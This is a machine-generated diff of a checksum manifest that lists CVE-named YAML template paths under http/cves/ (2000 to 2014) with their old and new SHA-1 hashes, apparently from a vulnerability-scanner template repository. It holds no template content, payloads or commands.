-http/cves/2002/CVE-2002-1131.yaml:f3a49e1602c229940eb661ed7c036e1dcd93d5e7 -http/cves/2004/CVE-2004-0519.yaml:bd027963cd8e706f35cef59cf0aa0b18a7a5d88a -http/cves/2004/CVE-2004-1965.yaml:625c074e4f76927af2a9706c2e73ebc2725770a6 -http/cves/2005/CVE-2005-2428.yaml:9000f422667f04e7ce6a0c9195e2392b8df8ffe5 -http/cves/2005/CVE-2005-3344.yaml:5fb6caf9ff8346fa14541a04809450217ab382f0 -http/cves/2005/CVE-2005-3634.yaml:d965762e63408e78559d2a393ea6cec231207b4b -http/cves/2005/CVE-2005-4385.yaml:d1553e6d4c1f5845b4472b5cad19c458a8b6c8e1 -http/cves/2006/CVE-2006-1681.yaml:6b17152834026637196e730f53574239848f08b9 -http/cves/2006/CVE-2006-2842.yaml:27ba276ba6df590a8354850d0a1a4aeb8da348c2 -http/cves/2007/CVE-2007-0885.yaml:922f26e2a0bb4d7d8602d25d7281c967f135d0e3 -http/cves/2007/CVE-2007-4504.yaml:e1f251aa7bb247514b4a7335929689ed75a796a5 -http/cves/2007/CVE-2007-4556.yaml:9d514b86474553613455dfdb556e4211b30c5696 -http/cves/2007/CVE-2007-5728.yaml:a3d256fc6e0a550424cfc8aa89d31d3d89c340fc -http/cves/2008/CVE-2008-1059.yaml:904e9e0247b33fd0c11e4dd5339c4834cd5cddf4 -http/cves/2008/CVE-2008-1061.yaml:74afa09cee1ef0e30c8893f39ececdcfcf4b21c1 -http/cves/2008/CVE-2008-1547.yaml:5726f97a827b2833457ec6640ea5292a67dd42a1 -http/cves/2008/CVE-2008-2398.yaml:c981fb87cb20bf922f8a6a41cf2af8877d5c22f6 -http/cves/2008/CVE-2008-2650.yaml:8f01def3b49e6ea113c2dac1d328811446173575 -http/cves/2008/CVE-2008-4668.yaml:b8b96f44b0f71b6d9b6278f4f65bc5161f7fb1eb -http/cves/2008/CVE-2008-4764.yaml:4dc3e8cb4f49f10496228e48c9c0c539bda59b68 -http/cves/2008/CVE-2008-5587.yaml:d3c4fa8126527c7af3834c85350e39b53c4af6a2 -http/cves/2008/CVE-2008-6080.yaml:3fead1e0654f12ba326936c2a96b8b6e2e30d745 -http/cves/2008/CVE-2008-6172.yaml:e8cb0e8ecc4dba09be6a56b3a4becc69cc0c2dd1 -http/cves/2008/CVE-2008-6222.yaml:cc51b581074f6a2c20bd6f7427a56eff004d3b4f -http/cves/2008/CVE-2008-6465.yaml:5d27b7cccfe7ce5ac6db272c68695c4ddea945e5 -http/cves/2008/CVE-2008-6668.yaml:2e7f954114cacbb8153deba30d753dabc5cb7adb -http/cves/2008/CVE-2008-6982.yaml:d719c42ba1ef41aebbfaa769f6b31c68028c75d4 -http/cves/2008/CVE-2008-7269.yaml:a0f4f6219e16176af1340078eabff03834db0add -http/cves/2009/CVE-2009-0347.yaml:d66eb7c12013ceaf3771614a195aec0a011a28bd -http/cves/2009/CVE-2009-0545.yaml:bd3ca23602acde99a99a0c15e9dfdc4999d506c5 -http/cves/2009/CVE-2009-0932.yaml:21703933d99a2a485abf6c715cf2749cf2d0b016 -http/cves/2009/CVE-2009-1151.yaml:c45e10df8cba4edce749677afc775677780dc583 -http/cves/2009/CVE-2009-1496.yaml:660e9e8a92f80688219f56696ed5e510bea2ef52 -http/cves/2009/CVE-2009-1558.yaml:80b7d6b9ea2b6ffb22a21071599be04f26844e4e -http/cves/2009/CVE-2009-1872.yaml:a0e8fd935976bb8b18f48be183e8d2215dcacd83 -http/cves/2009/CVE-2009-2015.yaml:d10a6b07c6f1e2391675fccea0f0fa31257874db -http/cves/2009/CVE-2009-2100.yaml:551736e4ffb19abfdfa11cf5a777b03f85b2299a -http/cves/2009/CVE-2009-3053.yaml:f7b0319e9ff45cb5882a3ce6335b0ca6196ebc7a -http/cves/2009/CVE-2009-3318.yaml:dc15fecdfe9f2fb259e32f3931a0d3e309828d1b -http/cves/2009/CVE-2009-4202.yaml:a739f18a0324f514368cdaeb6f42aef75d74358a -http/cves/2009/CVE-2009-4223.yaml:202416b7c093360d57d20b209d51d59d9301749e -http/cves/2009/CVE-2009-4679.yaml:4b018ce5bcf1d1f968612d5a257ac95a7c0cd0f4 -http/cves/2009/CVE-2009-5020.yaml:ab8064f4b8c720334f22f8ee79b97ba01b3dd6c3 -http/cves/2009/CVE-2009-5114.yaml:60bbca913ffedbd088f437a0a7ab97be2bcf8e87 -http/cves/2010/CVE-2010-0157.yaml:0a712e16d99f5160043e5e54540b5adaa4fc0879 -http/cves/2010/CVE-2010-0219.yaml:acc2eeb4ba265c7edbd110dd2967ee983949c6d2 -http/cves/2010/CVE-2010-0467.yaml:793fea30ace3e438070f003d0a573bd742893a31 -http/cves/2010/CVE-2010-0696.yaml:d118280c58ce49fdb6809e57211da49c3edd8549 -http/cves/2010/CVE-2010-0759.yaml:62476e2b8d038d4e21e1d99eca7aa2bac4774c54 -http/cves/2010/CVE-2010-0942.yaml:e4695e1db45395f09a4c6456ba0480f4f2898596 -http/cves/2010/CVE-2010-0943.yaml:3bb59176325e375eb82d73a1e9ca85c3fbd9966b -http/cves/2010/CVE-2010-0944.yaml:31e8fb5dc025a6c1c39c43d648f43ec0327d8378 -http/cves/2010/CVE-2010-0972.yaml:45ee54fdef5965b5ee430773e2b2e0761bb51675 -http/cves/2010/CVE-2010-0982.yaml:d5ccd213835b5bb24ce0623eb292d7bd59f12064 -http/cves/2010/CVE-2010-0985.yaml:ddd70ed4e9c54e62b5ec6e8bb38cbaa13b626732 -http/cves/2010/CVE-2010-1056.yaml:68efaaee2e08d0b77c642911f155516c84e1b960 -http/cves/2010/CVE-2010-1081.yaml:a4d4c2219710e2493e1b8d61e67b084915816ce2 -http/cves/2010/CVE-2010-1217.yaml:4f7171877b3c30280df4ebbda9c3dc081dac3522 -http/cves/2010/CVE-2010-1219.yaml:9c1d35954a6e973f34f34aa6cf7f2a023028bbe8 -http/cves/2010/CVE-2010-1302.yaml:6b6eff2cd3a99f17a1f513787359915c0034c15b -http/cves/2010/CVE-2010-1304.yaml:2b98e55f983b2b897eace3d588598a4e62af4b31 -http/cves/2010/CVE-2010-1305.yaml:4a0237d88c11098acd65b9b01f514c9f7662b695 -http/cves/2010/CVE-2010-1306.yaml:850ffb43695d6306e3703fce9f527b7a7eae3bf4 -http/cves/2010/CVE-2010-1307.yaml:792a3f5824a48934744148d873e53e70a5848814 -http/cves/2010/CVE-2010-1308.yaml:116ab1d72a505b3541958316a6dd7c43b3c800a0 -http/cves/2010/CVE-2010-1312.yaml:a9658240e959a79f46ef741f24369635554650b6 -http/cves/2010/CVE-2010-1313.yaml:c3dd1f8cde71f35a934c29cf974b60c6ca44e9ad -http/cves/2010/CVE-2010-1314.yaml:30d6c6751cfae081b39c622860afd774d55d0db5 -http/cves/2010/CVE-2010-1315.yaml:112eff912e0f7771095a55890d36d07503bcac61 -http/cves/2010/CVE-2010-1340.yaml:d44f624f9dfdb52a31fd24bce23096f471164ddf -http/cves/2010/CVE-2010-1345.yaml:b31ed6e9e8ac5db802d4c813b84c43758ab56f33 -http/cves/2010/CVE-2010-1352.yaml:cdbecbd2ae607a70b61562ac64c953d856e7de57 -http/cves/2010/CVE-2010-1353.yaml:71304337260415f72601866cd80e31b609a1cc05 -http/cves/2010/CVE-2010-1354.yaml:7f5a667faf54aead08142735cad5f939bd694394 -http/cves/2010/CVE-2010-1429.yaml:0e898e3df942636da00116c0097e9392638e27ca -http/cves/2010/CVE-2010-1461.yaml:cb8618df5f3d8d0730618978f96b46a157346bcf -http/cves/2010/CVE-2010-1469.yaml:b854ed255e55eb125f2cb38a43ecd4bef33781d5 -http/cves/2010/CVE-2010-1470.yaml:ff4e67215359d8bb772d5295540b6752b05dd83d -http/cves/2010/CVE-2010-1471.yaml:40895b282661336d762d76c3cf4be5c38326bef8 -http/cves/2010/CVE-2010-1472.yaml:20d8c3c4920249e231e430f62a687398127b9f53 -http/cves/2010/CVE-2010-1473.yaml:7e5639080d730dafb27e68ae476192178b9c8267 -http/cves/2010/CVE-2010-1474.yaml:7ab9a939577f3cbba88721e2ea7125e0de6b5eae -http/cves/2010/CVE-2010-1475.yaml:00e10e00a722d78236e1f633671c729fa0891d35 -http/cves/2010/CVE-2010-1476.yaml:83a60bc96c3e44026bf5947f77268aac5a5bd4f1 -http/cves/2010/CVE-2010-1478.yaml:e87278eae0183462d92c0d905fa97d4d8f82c7a7 -http/cves/2010/CVE-2010-1491.yaml:fdb1943fb29f185c376c77a9e38fcd7d9517199a -http/cves/2010/CVE-2010-1494.yaml:57a28e33a0ecb15a6f087fe897aa01d9b7a6d448 -http/cves/2010/CVE-2010-1495.yaml:89cc6078d93a53b4dc5f34e91eff4643dd93eee4 -http/cves/2010/CVE-2010-1531.yaml:37c63a5b2c05746d34fd0c43a4ec747e6554e65c -http/cves/2010/CVE-2010-1532.yaml:df251dd6487b9bb868648efa54c47147b35642db -http/cves/2010/CVE-2010-1533.yaml:a895322693b4a226b8c3a4625569b5216630c4ab -http/cves/2010/CVE-2010-1534.yaml:4bec33575cd9c9c3cbcc5da1f9e3bb43930f8dc1 -http/cves/2010/CVE-2010-1535.yaml:3ac73936081158c6336cf9f74b2b541f5057fa34 -http/cves/2010/CVE-2010-1540.yaml:89ee170569ec114c5176910a9d61c30e758853d2 -http/cves/2010/CVE-2010-1586.yaml:30538b10e0cb8877888f2468eb2779b2fb4d0073 -http/cves/2010/CVE-2010-1601.yaml:2143c6cb9871f336451789865c99e9f2f3d10765 -http/cves/2010/CVE-2010-1602.yaml:12342bbc6c45e7cd564f96ee05b51fefcdbd07f9 -http/cves/2010/CVE-2010-1603.yaml:4d3c06f666b1b583e95762c45cdd75401b11dadc -http/cves/2010/CVE-2010-1607.yaml:110736527cb2289e1ac6bb589e464aeb9172f636 -http/cves/2010/CVE-2010-1653.yaml:889177efee659f1b217cc10d2fb05107cab74195 -http/cves/2010/CVE-2010-1657.yaml:4440afb137504cb2d2ecf45df0beae1773ec2d36 -http/cves/2010/CVE-2010-1658.yaml:4236ffd6a7cbd4cb8cad647d8bb5eb412bb245f6 -http/cves/2010/CVE-2010-1659.yaml:16f630c33261d84069b8bc85751a3118cecc1268 -http/cves/2010/CVE-2010-1714.yaml:63a7cceead930d9289242729110e475f1e745819 -http/cves/2010/CVE-2010-1715.yaml:76548b6daae110826197fb8f669fda82a964e443 -http/cves/2010/CVE-2010-1717.yaml:8a2679cdc0ac7dadb5a556e8d7f897bf3035bf27 -http/cves/2010/CVE-2010-1718.yaml:a0f9660dcc91a1b00c0e7aeb262b3c158432737b -http/cves/2010/CVE-2010-1719.yaml:8b1a7ebbebcf71e272b474344c4764d6940b512b -http/cves/2010/CVE-2010-1722.yaml:0ad2ef09502bd175af9a51cb3cebdc2efd73ff67 -http/cves/2010/CVE-2010-1723.yaml:e763cf5761c0b3e43bc322668ea112814ea71f09 -http/cves/2010/CVE-2010-1858.yaml:75b48050de1c805a36bd1d30ad0de601859e8416 -http/cves/2010/CVE-2010-1870.yaml:a54959c1e8cd77f4d0a157038265805cf7f88438 -http/cves/2010/CVE-2010-1875.yaml:31efcc8a42d50b005f927282ba090460b098664d -http/cves/2010/CVE-2010-1878.yaml:f9d1531bbd2b8b9512d7db3081590cf02f666dab -http/cves/2010/CVE-2010-1952.yaml:226e6b6744875d20d9ff3032e7ab767bbf6708cf -http/cves/2010/CVE-2010-1953.yaml:46cb8f055c538cd3583d0c298ddb91fb89e4455b -http/cves/2010/CVE-2010-1954.yaml:9b5c369b6a44edb027264d1359547e425e5abaf0 -http/cves/2010/CVE-2010-1955.yaml:ff8439c5f5acefac8687c9559337fcd7dba4145a -http/cves/2010/CVE-2010-1956.yaml:3628786bb924cbd73dd3e702e71a03d4c4bf02ca -http/cves/2010/CVE-2010-1957.yaml:34fa8ded2243e90dc02f56696d8e4e848d901e36 -http/cves/2010/CVE-2010-1977.yaml:a32252255bbd11a877a094a6a776cec04ae77371 -http/cves/2010/CVE-2010-1979.yaml:ff348873911eb67a63884c74bf6930ed069a6c89 -http/cves/2010/CVE-2010-1980.yaml:1e8c70f987ca8aba255c14640c7d606117cbc4bb -http/cves/2010/CVE-2010-1981.yaml:b9b1f783cb1136f4cb500f7cba3e0c301c279255 -http/cves/2010/CVE-2010-1982.yaml:851f9f7f7d3354c5fe0d00b025ff8e74b13d5839 -http/cves/2010/CVE-2010-1983.yaml:222567bebb91e923cbb511023a3b9b15d67a2cd5 -http/cves/2010/CVE-2010-2033.yaml:699872df1a1c7fd486547948ddb378b28d56cc62 -http/cves/2010/CVE-2010-2034.yaml:c40ff5aeb6a0eafa53af894efb6fcf8d7d3b23c6 -http/cves/2010/CVE-2010-2035.yaml:1de31f4b66b0c3a1cd236077e34ddfa991b61ef8 -http/cves/2010/CVE-2010-2036.yaml:a4f118648e4e68e1d84d8d67ab9f5f59378f9531 -http/cves/2010/CVE-2010-2037.yaml:c2d3dab7495847f4cdf3e90da01bf3e528ae9427 -http/cves/2010/CVE-2010-2045.yaml:f4a001696a353616d1860806e313e261347d706b -http/cves/2010/CVE-2010-2050.yaml:89f2054a6f5d8f95fe159d5e6d2f8e81d95336de -http/cves/2010/CVE-2010-2122.yaml:be7cee6886b2740ff05169c9bc0a597108b47346 -http/cves/2010/CVE-2010-2128.yaml:c7715092442426261d608e2183e8eb194541cac3 -http/cves/2010/CVE-2010-2259.yaml:c44304b38b4ed1a339b236cda612f932cfa9be52 -http/cves/2010/CVE-2010-2307.yaml:3e2e5e3ad2f73b183846d52ccebb7fa73e0ec76f -http/cves/2010/CVE-2010-2507.yaml:1fa5c0f00650cf312f96c991a64888c59d294e20 -http/cves/2010/CVE-2010-2680.yaml:8e70dbbbd0f34a6b5e6eee7c7a34d9fe4d25c4d6 -http/cves/2010/CVE-2010-2682.yaml:a4414cf61e1f05bfa8a0908519a3ec707717da90 -http/cves/2010/CVE-2010-2857.yaml:82aec54c18541038d25b715392d16386bf3894c3 -http/cves/2010/CVE-2010-2861.yaml:d4eed5eec3202a134a9bbaaac11f268bade9c314 -http/cves/2010/CVE-2010-2918.yaml:8df8cceedca9e8f19dd3049ef43aab650e9dc284 -http/cves/2010/CVE-2010-2920.yaml:d1ce1d280d490cc143aecf37c5825e92b5f34665 -http/cves/2010/CVE-2010-3203.yaml:3bbce32b22ce99760f51b9c64dec2912d5d6c6bc -http/cves/2010/CVE-2010-3426.yaml:c0be5746d1eea905db40be4d8f899e0426efc6d7 -http/cves/2010/CVE-2010-4231.yaml:3b064820df1b50f0795a3d4bff38605279e92005 -http/cves/2010/CVE-2010-4239.yaml:22b5e74aab8120f6ef53fce843bbfd04b3a358ac -http/cves/2010/CVE-2010-4282.yaml:fb134e286be055134c91b90a568d8ce149658f6e -http/cves/2010/CVE-2010-4617.yaml:2646802524254e4c8e073dc3162a0519a172859c -http/cves/2010/CVE-2010-4719.yaml:519be4911953d2f659755ef03c3596765e0d0298 -http/cves/2010/CVE-2010-4769.yaml:e8bf64b7efda718be3f94d28ae681300f077dbe5 -http/cves/2010/CVE-2010-4977.yaml:bdd0d945d9126bfd6b7ec37140c62106335fd7dc -http/cves/2010/CVE-2010-5028.yaml:8fef1683bb3ed5257ca89f15e2b16d03b17afb65 -http/cves/2010/CVE-2010-5278.yaml:9c04fdcb6e5b663cdd00435e3b0b54a615b00cab -http/cves/2010/CVE-2010-5286.yaml:bed1cbfbe4ba2c412210659e8557cb59444f4d01 -http/cves/2011/CVE-2011-0049.yaml:4cd29cb47d84b711ec82c54ef4cdfa7063effa65 -http/cves/2011/CVE-2011-1669.yaml:e99e4670edef6739b08b0eb80113fa1ca47d9392 -http/cves/2011/CVE-2011-2744.yaml:fe2e202108a92a73da88f9bd1204e75ae0343ae1 -http/cves/2011/CVE-2011-2780.yaml:44b8eb7f266920e71ba6e115d0eea54e7722c2da -http/cves/2011/CVE-2011-3315.yaml:6f05b643e66aa483aa055791c7f1046db69b000c -http/cves/2011/CVE-2011-4336.yaml:9fe7eaed36bddb7ebf727bddfb26a571a652c087 -http/cves/2011/CVE-2011-4618.yaml:f3bfe36ae7f1130ebcfff44afdfbc9ec46e9224e -http/cves/2011/CVE-2011-4624.yaml:e9503eb77e6552802908bd11fb505e38ed8b3b12 -http/cves/2011/CVE-2011-4804.yaml:e4ef0a24f49fbb5a98b8203221c356bdebe7d6bf -http/cves/2011/CVE-2011-4926.yaml:ec9b3a7b9401419285697bed8a22d948b40a5a69 -http/cves/2011/CVE-2011-5106.yaml:d8de87a4a428d32f05744e46d981d49e658be00e -http/cves/2011/CVE-2011-5107.yaml:d99345a8976479d1218471afb5c3e2d6f3906f17 -http/cves/2011/CVE-2011-5179.yaml:581d00bbf5a33470238e6b32c963eca31150040e -http/cves/2011/CVE-2011-5181.yaml:4065e828281ed238da81d95a083401aa0e911f02 -http/cves/2011/CVE-2011-5252.yaml:b5345874205b751b245b0434c53db8977541e786 -http/cves/2011/CVE-2011-5265.yaml:0608d3ffd151e065b1f7a9e15af3c92b18c53747 -http/cves/2012/CVE-2012-0392.yaml:46cd3a89605877c4d559cf74a5e84a2e20b61629 -http/cves/2012/CVE-2012-0394.yaml:137026fd41efe2ea9b022f2da474007c6da11dea -http/cves/2012/CVE-2012-0896.yaml:afa78fbd9f6e8529f6b5881ce00acae0baa8f939 -http/cves/2012/CVE-2012-0901.yaml:4f6d0fb5f1f6c061051905e3e7bddfb5b1cbb9e6 -http/cves/2012/CVE-2012-0981.yaml:8e37ab67ce342570de2db2a45558a20d7dfb6841 -http/cves/2012/CVE-2012-0991.yaml:c0dea74dbafaf72e1d60975876535c6016b32c3e -http/cves/2012/CVE-2012-0996.yaml:e37030284745cc79a79bce3ee18b67de54124e8b -http/cves/2012/CVE-2012-1226.yaml:d252d31d9ea2907c31c55c872be5dccea042706e -http/cves/2012/CVE-2012-1823.yaml:7d7c43d44a355324f5f2fc12a8da1cdb780e567b -http/cves/2012/CVE-2012-1835.yaml:87b102ddeacda0701b0c70babe17dd17f75ac09b -http/cves/2012/CVE-2012-2371.yaml:29bd65fc0efded96ed946d1d4e63a70fd214779e -http/cves/2012/CVE-2012-3153.yaml:43c128da729425ed4e7f6f9adc4f830d668609ed -http/cves/2012/CVE-2012-4032.yaml:49fe0c4ea76cd43a71f84fd8452f2ffa5dfd4dfe -http/cves/2012/CVE-2012-4242.yaml:bcb9c1b078678d685178c5f729354888b1b02848 -http/cves/2012/CVE-2012-4253.yaml:0d6d8c8be4753e32d89a79bd4949cb4d74851e61 -http/cves/2012/CVE-2012-4273.yaml:afad1efc2d40c3970c76d2719037a2f10eb2b59f -http/cves/2012/CVE-2012-4547.yaml:c70733c070c12365a4b55a022d88769270878043 -http/cves/2012/CVE-2012-4768.yaml:7e4bc426bc06bdd2ee02eba42fb91bb755f79c7b -http/cves/2012/CVE-2012-4878.yaml:16df2e8e45685b7fe71448c7cca6fdee88917cba -http/cves/2012/CVE-2012-4889.yaml:6f37687a9b65d0d5c2d6a0c888c1ec930a7b00bf -http/cves/2012/CVE-2012-4940.yaml:d7b7c17f8f5eaf5082885b7652980d20cdfbb16f -http/cves/2012/CVE-2012-4982.yaml:9365c88a8a9e7e941b648f6ab3b5fa327081c54d -http/cves/2012/CVE-2012-5321.yaml:76088b0e3ac749d3d818f987a84f6ae39f5e8d80 -http/cves/2012/CVE-2012-5913.yaml:0fbb21c99c4833f806a58f97009b301c92cb3245 -http/cves/2012/CVE-2012-6499.yaml:fcc2b0fbced5b0ee5a8008450bf16535cfce15da -http/cves/2013/CVE-2013-1965.yaml:67ba66e9e3d0b352d0cedc6fefcb84cfcb6071df -http/cves/2013/CVE-2013-2248.yaml:c41ecc069e763e3e4777db70028c58826024c5b0 -http/cves/2013/CVE-2013-2251.yaml:980219f5306dfa166954236d53f656c869eb02c1 -http/cves/2013/CVE-2013-2287.yaml:5ec631415ff3c35ae5ed2a6f3e84a96a7bc90aa0 -http/cves/2013/CVE-2013-2621.yaml:affb71f4473ebab8f7be8f562d8de21f2d1cf44a -http/cves/2013/CVE-2013-3526.yaml:a9d70923b91a2a533dae3d414b7efce16916caef -http/cves/2013/CVE-2013-3827.yaml:6bb240aea1a2d904f479a08265decdb8c2abbba5 -http/cves/2013/CVE-2013-4117.yaml:cfdb28809e31a63d4f0b71dbaf29c1c0bf8b033c -http/cves/2013/CVE-2013-4625.yaml:3c85f2450fe950e9295350c75a242597eab98e58 -http/cves/2013/CVE-2013-5528.yaml:2c0eb220a44e808a773bade6a361d01ca4311322 -http/cves/2013/CVE-2013-5979.yaml:24114139f06b86807402ea2d8559a955469e7490 -http/cves/2013/CVE-2013-6281.yaml:d87563cb7b3d81f303ab8b5df62e2ccaec2b676c -http/cves/2013/CVE-2013-7091.yaml:8f9ea990355079fb27bec26b983c1410d4d7bf1d -http/cves/2013/CVE-2013-7240.yaml:e78ad18058989db6bb38811927c6d7318d52f3ad -http/cves/2013/CVE-2013-7285.yaml:4c65a45dae3e94964e31a123ff1da1f72432def1 -http/cves/2014/CVE-2014-10037.yaml:7c7317ca0b33c9e2097b22727de7313ced8c9749 -http/cves/2014/CVE-2014-1203.yaml:9f66a696255a351bb79701287eae9912d6d34b82 -http/cves/2014/CVE-2014-2321.yaml:8410d8f7af9453b3ad6b420ac7c851ba8b852545 -http/cves/2014/CVE-2014-2323.yaml:ac50ed09d0f48fcf433ce544e9ec5178e103e3af -http/cves/2014/CVE-2014-2383.yaml:3cda2616dfaa37a47f8e38888903d9f010c434e5 -http/cves/2014/CVE-2014-2908.yaml:f0cc2b36cfa82a9aff9564dcc99664f3184a58ef -http/cves/2014/CVE-2014-2962.yaml:0c863db87c007220a0e974063b6ac276ba4c4712 -http/cves/2014/CVE-2014-3120.yaml:3cc70e4b19d9726f46a0a7b7e35745ad8b14053a -http/cves/2014/CVE-2014-3206.yaml:209a04bc36a2e41fadc767f81817518175afcab7 -http/cves/2014/CVE-2014-3704.yaml:1f8a5279157a9abb15f60d7df78592f7dad4b5ec -http/cves/2014/CVE-2014-3744.yaml:fe367625357050ed5c0cfb1fa0ae5bd16666d820 -http/cves/2014/CVE-2014-4210.yaml:ca72a62a579a17167c01c30e26b75628e7d8465d -http/cves/2014/CVE-2014-4513.yaml:6e0af7ff8333d8b1291adf9e856740486bc182ed -http/cves/2014/CVE-2014-4535.yaml:3cad67d77a9e1764eab9dc6d63a5e6161a0af027 -http/cves/2014/CVE-2014-4536.yaml:cb0185f04eef81750553d885401ecb319f77d020 -http/cves/2014/CVE-2014-4539.yaml:ab4d52b8979d3c1a165d687a873455d4d67357f8 -http/cves/2014/CVE-2014-4544.yaml:48498796a7f4de53c0cce031f9cf82ad9c2c4db2 -http/cves/2014/CVE-2014-4550.yaml:e87dfb56124319e6a2a02b3172fbb4e98c22d966 -http/cves/2014/CVE-2014-4558.yaml:d8ce3baa425f77c11e935238adb83d07ff1c411b -http/cves/2014/CVE-2014-4561.yaml:5af6eb628c644a0d95ac084e7a13473b854cb224 -http/cves/2014/CVE-2014-4592.yaml:df39f52bea4676aa2e6db742ce5214667734f57f -http/cves/2014/CVE-2014-4940.yaml:98ece943eb52df43e1cce469ff3b8eb4e0690295 -http/cves/2014/CVE-2014-4942.yaml:bd9820297f7597cf3a2904aed8ba9f85d29394dc -http/cves/2014/CVE-2014-5111.yaml:b31db8813314a800d1562b30ecad11a55e64aa0b -http/cves/2014/CVE-2014-5258.yaml:4c9ebd06e4509b730a51a5d5c6fc4719a2e55e75 -http/cves/2014/CVE-2014-5368.yaml:1b47f09cce368e9179cd2ac2bcee0d96c7e860ba +http/cves/2000/CVE-2000-0114.yaml:067d1e108de85af822f5f3c0c5d06a4f51afcc81 +http/cves/2001/CVE-2001-0537.yaml:a89ce3f57d7280b16d4ad1dd983644c9a9ec61c3 +http/cves/2002/CVE-2002-1131.yaml:8fd9b7a6e4dcc3739b09c076f7914632491a1869 +http/cves/2004/CVE-2004-0519.yaml:5a9b179dffb02c5be048e6e953cb3a0ca3417658 +http/cves/2004/CVE-2004-1965.yaml:68c477ba6fdee9cb6d1a35fb844a7a72b59395c5 +http/cves/2005/CVE-2005-2428.yaml:a3a9870a7c77cd7bbc4aa6755b253a559dd0b935 +http/cves/2005/CVE-2005-3344.yaml:f873ada95b8338d8bab19ebce2dad0a7a4623a53 +http/cves/2005/CVE-2005-3634.yaml:7152a3c9cefc2e5e4af067a2b26788accb15cae7 +http/cves/2005/CVE-2005-4385.yaml:ca6d3d6b293da4813b39568efda565f06f77ab84 +http/cves/2006/CVE-2006-1681.yaml:96b7051eb997b66907f0c06ded95cdcc058ec62b +http/cves/2006/CVE-2006-2842.yaml:ae2f64ce0f5d8ecce66d9713709361c0c0d3a6ac +http/cves/2007/CVE-2007-0885.yaml:fd1dbbc1f892eb4221b2ec009f07bc5fa1150b58 +http/cves/2007/CVE-2007-4504.yaml:c8a7f755d72a4923241216abf88209e42706bf56 +http/cves/2007/CVE-2007-4556.yaml:df6579dc04835dbaa0ea48854b66f6f6ebff11a2 +http/cves/2007/CVE-2007-5728.yaml:e633a4ceae750e99029f9b36772c235d68e658fe +http/cves/2008/CVE-2008-1059.yaml:98b6a79ac6a41ea24601ebe33737137b6eee0d73 +http/cves/2008/CVE-2008-1061.yaml:08eacf9981be2ecb0b08fe584bf21805be588285 +http/cves/2008/CVE-2008-1547.yaml:bd9d8503df1e25d99def3c3a5a7bdf34ab3196eb +http/cves/2008/CVE-2008-2398.yaml:75ed8283492c51eb62e992976bc5ae3da6f232fa +http/cves/2008/CVE-2008-2650.yaml:00033910599b372d0f8482544e31d9005168f14e +http/cves/2008/CVE-2008-4668.yaml:64234630bf6ef78d2e4e23fdfc2ded49629cb14c +http/cves/2008/CVE-2008-4764.yaml:bebf787fac315b1f646a9d3c75438b3f9d2133b9 +http/cves/2008/CVE-2008-5587.yaml:ca60c6f4596b069cd9843e3ec711c36ab0ac66c5 +http/cves/2008/CVE-2008-6080.yaml:deafb977534ed6d8c564b4eaea0c85df0cda2e2f +http/cves/2008/CVE-2008-6172.yaml:6a09bc3b7dc84ce3c3618ad958af0856dc78e825 +http/cves/2008/CVE-2008-6222.yaml:21fbd5b1db4f0d8ad0c5d1faba9b600f4fc698cf +http/cves/2008/CVE-2008-6465.yaml:540621cc267029025f385454659b6ca494fa8700 +http/cves/2008/CVE-2008-6668.yaml:52913c1c8a3e286afb8735fde700e92b7dd4c355 +http/cves/2008/CVE-2008-6982.yaml:ae402e6c491d15da4be93025395031e1fc350451 +http/cves/2008/CVE-2008-7269.yaml:edd2404bf4fc97d16a93bf3bffd162e0ecbf33a8 +http/cves/2009/CVE-2009-0347.yaml:82137ac4d799ec8bda4e15d697b96290f3f3001a +http/cves/2009/CVE-2009-0545.yaml:f80113964c97143fcfb43951786bd76781779c49 +http/cves/2009/CVE-2009-0932.yaml:e1f59219e0a3972b7b68b6decf0d1cd112aaa7f5 +http/cves/2009/CVE-2009-1151.yaml:434c2996b2855635bf98720d1089edba20c17541 +http/cves/2009/CVE-2009-1496.yaml:f6c0e5c9fbedb48a1a23e0aa77436366eb07db55 +http/cves/2009/CVE-2009-1558.yaml:80baa0d71e86f715a8db059d538a0acc8964dee1 +http/cves/2009/CVE-2009-1872.yaml:8d33fdb196a9bfa971f7502ab000ac742a997073 +http/cves/2009/CVE-2009-2015.yaml:9f44b14cac431488713204c0dc5b70a552c7a697 +http/cves/2009/CVE-2009-2100.yaml:f30f8746d066f1fa4b028f6e9b5e2c53684ca5b2 +http/cves/2009/CVE-2009-3053.yaml:9b825b16b3978061e9692b1f46cf991aecb4fd8a +http/cves/2009/CVE-2009-3318.yaml:b1944c455f1bace66e81a444d6f799a001b436f1 +http/cves/2009/CVE-2009-4202.yaml:6826a02a2c2f45ba6b35f87bf4a4d6e5c99f6c5b +http/cves/2009/CVE-2009-4223.yaml:1c1236153c9179b4735fc3223d93c61e75601eb7 +http/cves/2009/CVE-2009-4679.yaml:87bad51cf24245df929957c21f92517e864ca0a8 +http/cves/2009/CVE-2009-5020.yaml:5c7b1b01813019f64e013911be51e45850646a4b +http/cves/2009/CVE-2009-5114.yaml:02d3adb141c9d1fe9e4916440f4c712e64c845ce +http/cves/2010/CVE-2010-0157.yaml:f74b638ce2f39856527dfba4935b332c36eec42b +http/cves/2010/CVE-2010-0219.yaml:40b3f0220f2e9acceff32fcafba7de8eca2c5906 +http/cves/2010/CVE-2010-0467.yaml:aadae20becedaa183de78ffde37715656b8f6e6e +http/cves/2010/CVE-2010-0696.yaml:c9c9d01d3a6f189874e2526ac1e066b0137a83af +http/cves/2010/CVE-2010-0759.yaml:be249747424f1457b82a0539ccfe9e5fdf0d0cff +http/cves/2010/CVE-2010-0942.yaml:b022b4d4e260ad4898b686fdcbe9655ec802b9a6 +http/cves/2010/CVE-2010-0943.yaml:ea58fb448de9e8113f259c650767c92333477b5f +http/cves/2010/CVE-2010-0944.yaml:a784760dbfa8c43d12a400e17988bbfecddd4fc1 +http/cves/2010/CVE-2010-0972.yaml:4767e752684350cb0373d7cd8762c612d4ca2f13 +http/cves/2010/CVE-2010-0982.yaml:e1bfbd5d728445755cb5ed97ddb251e53294abbe +http/cves/2010/CVE-2010-0985.yaml:535ad20b8779d8dfae3e7751248227ebc70ddf57 +http/cves/2010/CVE-2010-1056.yaml:7ac785b09b79a24cdd672a7f774fc3d4007c52f4 +http/cves/2010/CVE-2010-1081.yaml:4d08b6a3241e93b2538728e951ab456e8a59c047 +http/cves/2010/CVE-2010-1217.yaml:2dc728e2e8ff349e352432d99e70b58b0677bf2e +http/cves/2010/CVE-2010-1219.yaml:bc7d906752d77819adae94c75987f5a34f85ced0 +http/cves/2010/CVE-2010-1302.yaml:0466c215547d0981b380fa2a2f4f1469eb36dd7c 